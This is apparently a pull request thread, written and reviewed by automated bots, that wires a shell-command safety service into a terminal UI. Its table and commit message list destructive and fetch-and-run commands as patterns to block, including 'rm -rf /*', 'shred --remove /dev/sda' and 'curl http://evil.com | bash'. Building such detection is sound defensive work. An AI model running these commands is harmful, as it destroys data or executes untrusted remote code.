fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous #10890

Open
HAL9000 wants to merge 2 commits from bugfix/m8-shell-safety-service-integration into master
Owner

Summary

This PR fixes issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded patterns instead of the ShellSafetyService with its 12-pattern registry.

Changes

  • src/cleveragents/tui/input/shell_exec.py: Removed looks_dangerous() function. Added ShellSafetyService integration via _make_warn_callback() helper. The confirm_dangerous callback API is preserved for backward compatibility.
  • src/cleveragents/cli/commands/repl.py: Updated _run_shell_command() to use ShellSafetyService instead of the removed looks_dangerous() function.
  • features/tui_shell_exec_coverage.feature: Updated tests to remove looks_dangerous references. Added 8 TDD regression scenarios tagged @tdd_issue @tdd_issue_4736 verifying all previously-missed patterns are now blocked.
  • features/steps/tui_shell_exec_coverage_steps.py: Updated step definitions to remove looks_dangerous import and add new step for the regression test.

Patterns now correctly blocked

Pattern Before After
rm -rf /* (wildcard) missed CRITICAL
rm -rf ~/ (home dir) missed CRITICAL
shred --remove /dev/sda missed HIGH
chmod 777 /etc missed MEDIUM
sudo rm -rf /tmp missed MEDIUM
wget http://evil.com/x | sh missed MEDIUM
curl http://evil.com | bash missed MEDIUM

Closes #4736

This PR blocks issue #4736


Automated by CleverAgents Bot
Supervisor: Implementation | Agent: task-implementor

## Summary This PR fixes issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded patterns instead of the `ShellSafetyService` with its 12-pattern registry. ### Changes - **`src/cleveragents/tui/input/shell_exec.py`**: Removed `looks_dangerous()` function. Added `ShellSafetyService` integration via `_make_warn_callback()` helper. The `confirm_dangerous` callback API is preserved for backward compatibility. - **`src/cleveragents/cli/commands/repl.py`**: Updated `_run_shell_command()` to use `ShellSafetyService` instead of the removed `looks_dangerous()` function. - **`features/tui_shell_exec_coverage.feature`**: Updated tests to remove `looks_dangerous` references. Added 8 TDD regression scenarios tagged `@tdd_issue @tdd_issue_4736` verifying all previously-missed patterns are now blocked. - **`features/steps/tui_shell_exec_coverage_steps.py`**: Updated step definitions to remove `looks_dangerous` import and add new step for the regression test. ### Patterns now correctly blocked | Pattern | Before | After | |---|---|---| | `rm -rf /*` (wildcard) | ❌ missed | ✅ CRITICAL | | `rm -rf ~/` (home dir) | ❌ missed | ✅ CRITICAL | | `shred --remove /dev/sda` | ❌ missed | ✅ HIGH | | `chmod 777 /etc` | ❌ missed | ✅ MEDIUM | | `sudo rm -rf /tmp` | ❌ missed | ✅ MEDIUM | | `wget http://evil.com/x \| sh` | ❌ missed | ✅ MEDIUM | | `curl http://evil.com \| bash` | ❌ missed | ✅ MEDIUM | Closes #4736 This PR blocks issue #4736 --- Automated by CleverAgents Bot Supervisor: Implementation | Agent: task-implementor
HAL9000 added this to the v3.7.0 milestone 2026-04-28 08:05:52 +00:00
fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
CI / helm (pull_request) Successful in 34s
CI / build (pull_request) Successful in 52s
CI / lint (pull_request) Failing after 1m7s
CI / quality (pull_request) Successful in 1m15s
CI / typecheck (pull_request) Successful in 1m36s
CI / security (pull_request) Successful in 1m38s
CI / coverage (pull_request) Has been skipped
CI / push-validation (pull_request) Successful in 22s
CI / unit_tests (pull_request) Failing after 3m27s
CI / docker (pull_request) Has been skipped
CI / integration_tests (pull_request) Successful in 4m36s
CI / e2e_tests (pull_request) Successful in 5m3s
CI / status-check (pull_request) Failing after 3s
393127639e
Replace the inline 5-pattern looks_dangerous() function in shell_exec.py with
the ShellSafetyService (12-pattern registry, 4 severity levels). This fixes a
spec compliance bug where 7 of 12 dangerous patterns were silently bypassed.

Also update repl.py to use ShellSafetyService instead of looks_dangerous().

Add TDD regression tests (@tdd_issue, @tdd_issue_4736) verifying that all
previously-missed patterns (rm -rf wildcard, rm -rf ~/, shred --remove,
chmod 777, sudo rm, wget|sh, curl|bash) are now correctly blocked.

ISSUES CLOSED: #4736
HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked.

Checklist

  1. CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper.

  2. SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection.

  3. TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr.

  4. TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere.

  5. READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly.

  6. PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization.

  7. SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher.

  8. CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback.

  9. DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration.

  10. COMMIT AND PR QUALITY -- ISSUES NOTED:

  • Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR.
  • CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge.

Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference.


Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked. ## Checklist 1. CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper. 2. SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection. 3. TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr. 4. TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere. 5. READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly. 6. PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization. 7. SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher. 8. CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback. 9. DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration. 10. COMMIT AND PR QUALITY -- ISSUES NOTED: - Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR. - CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge. Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Owner

PR Review Complete

Status: COMMENT (no blocking issues, suggestions provided)


Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**PR Review Complete** Status: **COMMENT** (no blocking issues, suggestions provided) --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 requested changes 2026-04-28 12:56:45 +00:00
Dismissed
HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns instead of the ShellSafetyService with its 12-pattern regex registry.

Overall Assessment

The implementation quality is strong. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically:

  • CORRECTNESS — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both shell_exec.py and repl.py. The old 5-pattern substring matcher is fully removed.
  • SPECIFICATION ALIGNMENT — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry.
  • TEST QUALITY — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands.
  • TYPE SAFETY — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore.
  • READABILITY — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation.
  • SECURITY — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed.
  • CODE STYLE — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file.
  • DOCUMENTATION — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior.

Blocking Issues

1. CI Gates Failing

Three required CI checks are failing:

  • CI / lint (pull_request) — Failing (1m7s). This is a required gate.
  • CI / unit_tests (pull_request) — Failing (3m27s). This is a required gate.
  • CI / status-check (pull_request) — Failing (aggregator of required checks).

Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run nox -s lint to fix lint issues and nox -s unit_tests to diagnose and fix the test failures.

2. Missing Type/ Label

The PR has zero labels. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (Type/Bug). The contributing guidelines require exactly one Type/ label per PR.

Non-Blocking Notes

  • Minor: ShellSafetyService instantiation per call — Both shell_exec.py and repl.py instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded substring patterns instead of the `ShellSafetyService` with its 12-pattern regex registry. ## Overall Assessment The implementation quality is **strong**. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically: - CORRECTNESS ✅ — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both `shell_exec.py` and `repl.py`. The old 5-pattern substring matcher is fully removed. - SPECIFICATION ALIGNMENT ✅ — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry. - TEST QUALITY ✅ — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands. - TYPE SAFETY ✅ — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore. - READABILITY ✅ — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation. - SECURITY ✅ — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed. - CODE STYLE ✅ — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file. - DOCUMENTATION ✅ — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior. ## Blocking Issues ### 1. CI Gates Failing Three required CI checks are failing: - **CI / lint (pull_request)** — Failing (1m7s). This is a required gate. - **CI / unit_tests (pull_request)** — Failing (3m27s). This is a required gate. - **CI / status-check (pull_request)** — Failing (aggregator of required checks). Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run `nox -s lint` to fix lint issues and `nox -s unit_tests` to diagnose and fix the test failures. ### 2. Missing Type/ Label The PR has **zero labels**. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (`Type/Bug`). The contributing guidelines require exactly one Type/ label per PR. ## Non-Blocking Notes - **Minor: ShellSafetyService instantiation per call** — Both `shell_exec.py` and `repl.py` instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Owner

First Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Summary

PR #10890 correctly replaces the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios.

Blocking Issues

  1. CI failurelint, unit_tests, and status-check are failing. Per company policy, all CI gates must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
  2. Missing Type/ label — PR has zero labels. As a bug-fix PR, it must have exactly one Type/ label (Type/Bug).

Checklist Results

Category Status
Correctness PASS
Specification Alignment PASS
Test Quality PASS
Type Safety PASS
Readability PASS
Performance ⚠️ Minor note
Security PASS
Code Style PASS
Documentation PASS
Commit and PR Quality Failing (CI + labels)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**First Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Summary PR #10890 correctly replaces the legacy 5-pattern `looks_dangerous()` function with the `ShellSafetyService` 12-pattern registry across both `shell_exec.py` and `repl.py`. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios. ### Blocking Issues 1. **CI failure** — `lint`, `unit_tests`, and `status-check` are failing. Per company policy, all CI gates must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/ label** — PR has zero labels. As a bug-fix PR, it must have exactly one `Type/` label (`Type/Bug`). ### Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS | | Specification Alignment | ✅ PASS | | Test Quality | ✅ PASS | | Type Safety | ✅ PASS | | Readability | ✅ PASS | | Performance | ⚠️ Minor note | | Security | ✅ PASS | | Code Style | ✅ PASS | | Documentation | ✅ PASS | | Commit and PR Quality | ❌ Failing (CI + labels) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 requested changes 2026-04-28 14:26:45 +00:00
Dismissed
HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added.

Previous Feedback Check

The previous review (HAL9001, REQUEST_CHANGES) flagged:

  1. CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR
  2. Missing Type/ label -- Still absent. PR still has zero labels.

Blocking Issues

1. Test scenarios broken by step removal

The step definition @when("I run a dangerous command ... with the callback") was removed but two scenarios in tui_shell_exec_coverage.feature still reference it:

  • Scenario: "Dangerous command confirmed via callback proceeds to execution"
  • Scenario: "Dangerous command confirmed but callback returns False is still blocked"

These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail.

Options:

  • Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR
  • Remove these scenarios entirely since callback behavior is now tested through TDD regression tests

2. Missing Type/ Label

Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels.

Checklist Results

Category Status
Correctness PASS
Specification Alignment PASS
Test Quality FAIL - 2 orphaned scenarios reference deleted step definitions
Type Safety PASS
Readability PASS
Performance Minor note - ShellSafetyService instantiated per call
Security PASS - Net improvement: 7 previously-silent patterns now blocked
Code Style PASS
Documentation PASS
Commit and PR Quality FAIL - Missing Type/ label, CI failing

Non-Blocking Notes

  • The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency.
  • TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added. ## Previous Feedback Check The previous review (HAL9001, REQUEST_CHANGES) flagged: 1. CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR 2. Missing Type/ label -- Still absent. PR still has zero labels. ## Blocking Issues ### 1. Test scenarios broken by step removal The step definition `@when("I run a dangerous command ... with the callback")` was removed but two scenarios in tui_shell_exec_coverage.feature still reference it: - Scenario: "Dangerous command confirmed via callback proceeds to execution" - Scenario: "Dangerous command confirmed but callback returns False is still blocked" These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail. Options: - Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR - Remove these scenarios entirely since callback behavior is now tested through TDD regression tests ### 2. Missing Type/ Label Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels. ## Checklist Results | Category | Status | |---|---| | Correctness | PASS | | Specification Alignment | PASS | | Test Quality | FAIL - 2 orphaned scenarios reference deleted step definitions | | Type Safety | PASS | | Readability | PASS | | Performance | Minor note - ShellSafetyService instantiated per call | | Security | PASS - Net improvement: 7 previously-silent patterns now blocked | | Code Style | PASS | | Documentation | PASS | | Commit and PR Quality | FAIL - Missing Type/ label, CI failing | ## Non-Blocking Notes - The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency. - TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
@ -48,0 +50,4 @@
# These scenarios verify that ShellSafetyService (12-pattern registry) is
# used instead of the legacy looks_dangerous() function.
@tdd_issue @tdd_issue_4736
Owner

Two scenarios reference step definitions removed in this PR. The step @when('I run a dangerous command with the callback') no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.

Two scenarios reference step definitions removed in this PR. The step `@when('I run a dangerous command with the callback')` no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.
@ -389,3 +389,3 @@
_console.print("[yellow]Shell mode is disabled by configuration.[/yellow]")
return 2
if looks_dangerous(command_text):
def _warn_callback(warning: DangerousCommandWarning) -> bool:
Owner

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files.


Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Owner

Automated review complete for PR #10890.

Result: REQUEST_CHANGES

Blocking issues:

  1. Two orphaned Behave scenarios reference deleted step definitions (@when("I run a dangerous command ... with the callback")), causing unit_tests to fail with "Step not implemented" errors.
  2. Missing Type/Bug label -- the PR has zero labels.

Code quality is strong: correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively.

Non-blocking notes: Consider moving the _warn_callback in repl.py to module level for consistency, and consider mocking subprocess.run in TDD regression scenarios for robustness.


Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

Automated review complete for PR #10890. **Result: REQUEST_CHANGES** **Blocking issues:** 1. Two orphaned Behave scenarios reference deleted step definitions (`@when("I run a dangerous command ... with the callback")`), causing `unit_tests` to fail with "Step not implemented" errors. 2. Missing `Type/Bug` label -- the PR has zero labels. **Code quality is strong:** correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively. **Non-blocking notes:** Consider moving the `_warn_callback` in `repl.py` to module level for consistency, and consider mocking `subprocess.run` in TDD regression scenarios for robustness. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
fix(tui): update tui_input_modes_steps.py to use ShellSafetyService instead of removed looks_dangerous
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
CI / push-validation (pull_request) Successful in 35s
CI / helm (pull_request) Successful in 47s
CI / build (pull_request) Successful in 1m2s
CI / lint (pull_request) Failing after 1m30s
CI / quality (pull_request) Successful in 1m38s
CI / typecheck (pull_request) Successful in 1m56s
CI / security (pull_request) Successful in 1m55s
CI / coverage (pull_request) Has been skipped
CI / integration_tests (pull_request) Successful in 5m2s
CI / e2e_tests (pull_request) Successful in 5m44s
CI / unit_tests (pull_request) Failing after 6m30s
CI / docker (pull_request) Has been skipped
CI / status-check (pull_request) Failing after 3s
730c225298
HAL9001 left a comment

Second Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior Feedback Status

# Previous Concern Status
1 Orphaned step definitions (with the callback) ADDRESSED — step definition exists at line 107 of tui_shell_exec_coverage_steps.py, feature file correctly references it with subprocess.run mocking
2 _warn_callback nested function (non-blocking) ⚠️ Not addressed yet (non-blocking suggestion)

Blocking Issues

  1. CI failurelint and unit_tests are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
  2. Missing Type/Bug label — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (Type/Bug).
  3. Missing milestone and changelog — The PR body does not include a closing keyword (Closes/Fixes) for issue #4736 on its own line per PR requirements.

Checklist Results

Category Status
Correctness PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry
Specification Alignment PASS — Aligns with spec that TUI shell mode should use ShellSafetyService
Test Quality PASS — 8 TDD regression scenarios (@tdd_issue_4736) cover all 7 previously-missed patterns plus removal verification
Type Safety PASS — All signatures annotated, zero # type: ignore
Readability PASS — Clear names, clean adapter pattern in _make_warn_callback
Performance PASS — No concerns
Security PASS — Net improvement: 5→12 patterns, proper regex vs substring matching
Code Style ⚠️ Minor — _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback() for consistency
Documentation PASS — Docstrings present for all public functions
Commit and PR Quality FAILING (CI + labels + closing keyword)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Second Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior Feedback Status | # | Previous Concern | Status | |---|---|---| | 1 | Orphaned step definitions (`with the callback`) | ✅ ADDRESSED — step definition exists at line 107 of `tui_shell_exec_coverage_steps.py`, feature file correctly references it with subprocess.run mocking | | 2 | _warn_callback nested function (non-blocking) | ⚠️ Not addressed yet (non-blocking suggestion) | ## Blocking Issues 1. **CI failure** — `lint` and `unit_tests` are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/Bug label** — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (`Type/Bug`). 3. **Missing milestone and changelog** — The PR body does not include a closing keyword (`Closes`/`Fixes`) for issue #4736 on its own line per PR requirements. ## Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry | | Specification Alignment | ✅ PASS — Aligns with spec that TUI shell mode should use ShellSafetyService | | Test Quality | ✅ PASS — 8 TDD regression scenarios (`@tdd_issue_4736`) cover all 7 previously-missed patterns plus removal verification | | Type Safety | ✅ PASS — All signatures annotated, zero `# type: ignore` | | Readability | ✅ PASS — Clear names, clean adapter pattern in `_make_warn_callback` | | Performance | ✅ PASS — No concerns | | Security | ✅ PASS — Net improvement: 5→12 patterns, proper regex vs substring matching | | Code Style | ⚠️ Minor — `_warn_callback` in `repl.py` is a nested function while `shell_exec.py` uses module-level `_make_warn_callback()` for consistency | | Documentation | ✅ PASS — Docstrings present for all public functions | | Commit and PR Quality | ❌ FAILING (CI + labels + closing keyword) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Owner

Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior feedback addressed:

  1. Orphaned step definitions (with the callback) — FIXED
  2. _warn_callback nested function — ⚠️ Not addressed (non-blocking suggestion only)

Blocking issues (same as previous review):

  1. CI failurelint and unit_tests are still failing. All CI gates must pass.
  2. Missing Type/Bug label — PR has zero labels.

Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation.


Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior feedback addressed: 1. Orphaned step definitions (`with the callback`) — ✅ FIXED 2. `_warn_callback` nested function — ⚠️ Not addressed (non-blocking suggestion only) ## Blocking issues (same as previous review): 1. **CI failure** — `lint` and `unit_tests` are still failing. All CI gates must pass. 2. **Missing Type/Bug label** — PR has zero labels. ## Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Owner

Correction to my previous review (#7090)

In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain Closes #4736 on its own line — this is fine.

The actual remaining blockers are:

  1. CI failurelint and unit_tests still failing
  2. Missing Type/Bug label — PR has zero labels

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Correction to my previous review (#7090)** In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain `Closes #4736` on its own line — this is fine. The actual remaining blockers are: 1. **CI failure** — `lint` and `unit_tests` still failing 2. **Missing Type/Bug label** — PR has zero labels --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
CI / push-validation (pull_request) Successful in 35s
CI / helm (pull_request) Successful in 47s
CI / build (pull_request) Successful in 1m2s
Required
Details
CI / lint (pull_request) Failing after 1m30s
Required
Details
CI / quality (pull_request) Successful in 1m38s
Required
Details
CI / typecheck (pull_request) Successful in 1m56s
Required
Details
CI / security (pull_request) Successful in 1m55s
Required
Details
CI / coverage (pull_request) Has been skipped
Required
Details
CI / integration_tests (pull_request) Successful in 5m2s
Required
Details
CI / e2e_tests (pull_request) Successful in 5m44s
CI / unit_tests (pull_request) Failing after 6m30s
Required
Details
CI / docker (pull_request) Has been skipped
Required
Details
CI / status-check (pull_request) Failing after 3s
This pull request doesn't have enough approvals yet. 0 of 1 approvals granted.
This branch is out-of-date with the base branch
You are not authorized to merge this pull request.
View command line instructions

Checkout

From your project repository, check out a new branch and test the changes.
git fetch -u origin bugfix/m8-shell-safety-service-integration:bugfix/m8-shell-safety-service-integration
git switch bugfix/m8-shell-safety-service-integration
Sign in to join this conversation.
No reviewers
No milestone
No project
No assignees
2 participants
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
cleveragents/cleveragents-core!10890
No description provided.